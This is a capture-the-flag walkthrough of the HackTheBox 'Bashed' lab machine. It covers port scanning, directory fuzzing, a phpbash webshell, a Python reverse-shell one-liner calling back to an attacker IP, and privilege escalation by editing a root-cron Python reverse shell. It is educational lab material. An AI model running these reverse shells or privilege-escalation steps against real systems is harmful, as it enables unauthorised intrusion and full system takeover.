Bashed
Port Checking
naabu -host bashed.htb -v
__
___ ___ ___ _/ / __ __
/ _ \/ _ \/ _ \/ _ \/ // /
/_//_/\_,_/\_,_/_.__/\_,_/ v2.0.5
projectdiscovery.io
Use with caution. You are responsible for your actions
Developers assume no liability and are not responsible for any misuse or damage.
[INF] Running CONNECT scan with non root privileges
[DBG] Using host 10.10.10.68 for enumeration
[INF] Found 1 ports on host bashed.htb (10.10.10.68)
bashed.htb:80
Open ports:
port 80 web
Visiting the webpage present us with phpbash software , after some googling and poking around it is found that phpbash is a webshell so , the dev might left it somewhere on the website to allow us to execute RCE ?
Directory Fuzzing
dirb http://bashed.htb
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Thu Aug 24 05:37:07 2023
URL_BASE: http://bashed.htb/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://bashed.htb/ ----
==> DIRECTORY: http://bashed.htb/css/
==> DIRECTORY: http://bashed.htb/dev/
==> DIRECTORY: http://bashed.htb/fonts/
==> DIRECTORY: http://bashed.htb/images/
+ http://bashed.htb/index.html (CODE:200|SIZE:7743)
==> DIRECTORY: http://bashed.htb/js/
==> DIRECTORY: http://bashed.htb/php/
+ http://bashed.htb/server-status (CODE:403|SIZE:298)
==> DIRECTORY: http://bashed.htb/uploads/
/dev
seems sus , visiting the webpage show us two php files
phpbash.php
phpbash.min.php
Foothold
Multiple reverse shells attempt have been made but this works
export RHOST="YOUR_IP";export RPORT=4567;python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'
Get Stable Shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
press CTRL + Z (go background in linux)
stty raw -echo;fg (get shell and return to session)
press ENTER to get shell
Checks
id
sudo -l
Matching Defaults entries for www-data on bashed:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on bashed:
(scriptmanager : scriptmanager) NOPASSWD: ALL
Priv Esc
Cool , user scriptmanager
can run anything
sudo -u scriptmanager /bin/bash
config.php
cat config.php
<?php
//SITE GLOBAL CONFIGURATION
$email = "yourmail@here.com"; //<-- Your email
?>
No creds found sadly
/scripts
was found on root directory
drwxrwxr-- 2 scriptmanager scriptmanager 4096 Aug 23 08:29 scripts
Contents of the folder
-rw-r--r-- 1 scriptmanager scriptmanager 218 Aug 23 08:29 test.py
-rw-r--r-- 1 root root 12 Aug 23 08:29 test.txt
First glance looks like the file auto run and output to test.txt ?
Content of test.py
import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("10.10.16.4",1234));os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);
p=subprocess.call(["/bin/sh","-i"]);
File content is literally a reverse shell
Change to ip to ours and open listener
nano test.py
s.connect(("YOUR_IP",1234));os.dup2(s.fileno(),0);
Wait a while and walaa
nc -nvlp 1234
listening on [any] 1234 ...
connect to [10.10.x.x] from (UNKNOWN) [10.10.10.68] 38206
/bin/sh: 0: can't access tty; job control turned off
# whoami
root
crontab
crontab -l
* * * * * cd /scripts; for f in *.py; do python "$f"; done
Crontab confirms that there is root cron that run all
.py
file in/scripts
Last updated